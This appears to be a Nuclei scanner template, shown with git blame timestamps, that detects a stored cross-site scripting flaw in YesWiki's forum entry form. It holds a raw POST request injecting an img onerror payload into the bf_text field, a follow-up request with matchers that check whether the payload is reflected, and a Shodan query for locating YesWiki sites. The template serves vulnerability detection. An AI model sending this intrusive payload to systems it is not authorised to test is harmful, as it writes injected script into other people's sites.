2022-08-09 07:27:50 +00:00
|
|
|
id: yeswiki-stored-xss
|
2022-08-08 21:10:20 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: YesWiki - Stored Cross-Site Scripting
|
2022-08-08 21:10:20 +00:00
|
|
|
author: arafatansari
|
2022-09-23 17:53:08 +00:00
|
|
|
severity: high
|
2022-08-08 21:10:20 +00:00
|
|
|
description: |
|
2022-09-23 17:53:08 +00:00
|
|
|
YesWiki contains a stored contains a cross-site scripting vulnerability via the bf_text field when adding a new entry for Forum.
|
2022-08-08 21:10:20 +00:00
|
|
|
reference:
|
2022-08-09 07:27:50 +00:00
|
|
|
- https://huntr.dev/bounties/5f27a9b1-c092-47e2-8092-a81298a4b932/
|
2022-09-23 17:53:08 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2022-08-08 21:10:20 +00:00
|
|
|
metadata:
|
2022-08-09 07:27:50 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 2
|
2022-08-08 21:10:20 +00:00
|
|
|
shodan-query: http.html:"yeswiki"
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: yeswiki,xss,stored-xss,huntr,intrusive
|
2022-08-08 21:10:20 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-08 21:10:20 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /?BazaR&vue=saisir&action=saisir_fiche&id=2 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="bf_titre"
|
|
|
|
|
|
|
|
blog
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="bf_text"
|
|
|
|
|
2022-08-09 18:36:59 +00:00
|
|
|
"><img src=x onerror=console.log(123);>
|
2022-08-08 21:10:20 +00:00
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="file"; filename=""
|
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="bf_description"
|
|
|
|
|
|
|
|
abcd
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="fichierbf_file"; filename=""
|
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="antispam"
|
|
|
|
|
|
|
|
1
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu
|
|
|
|
Content-Disposition: form-data; name="id_typeannonce"
|
|
|
|
|
|
|
|
2
|
|
|
|
------WebKitFormBoundaryT8dS2PT0WtxACLyu--
|
|
|
|
- |
|
|
|
|
GET /?BazaR&vue=consulter HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers:
|
2022-08-09 07:27:50 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2023-06-19 21:10:30 +00:00
|
|
|
- "contains(header_2, 'text/html') && contains(header_2, 'YesWiki')"
|
2022-08-09 07:27:50 +00:00
|
|
|
- "status_code_2 == 200"
|
2022-08-09 18:36:59 +00:00
|
|
|
- contains(body_2, '><img src=x onerror=console.log(123);>')
|
2022-08-08 21:10:20 +00:00
|
|
|
condition: and
|
2023-11-27 09:19:41 +00:00
|
|
|
|
|
|
|
# digest: 4a0a0047304502201f0e4ff23cec2986edd79c2da5735c84cef6ac2abd8e1926b37b64375a77b57e022100dbd9061054542ce5c944ee769fd15843b30682e3ecbdabc9e355dfea64f8422e:922c64590222798bb761d5b6d8e72950
|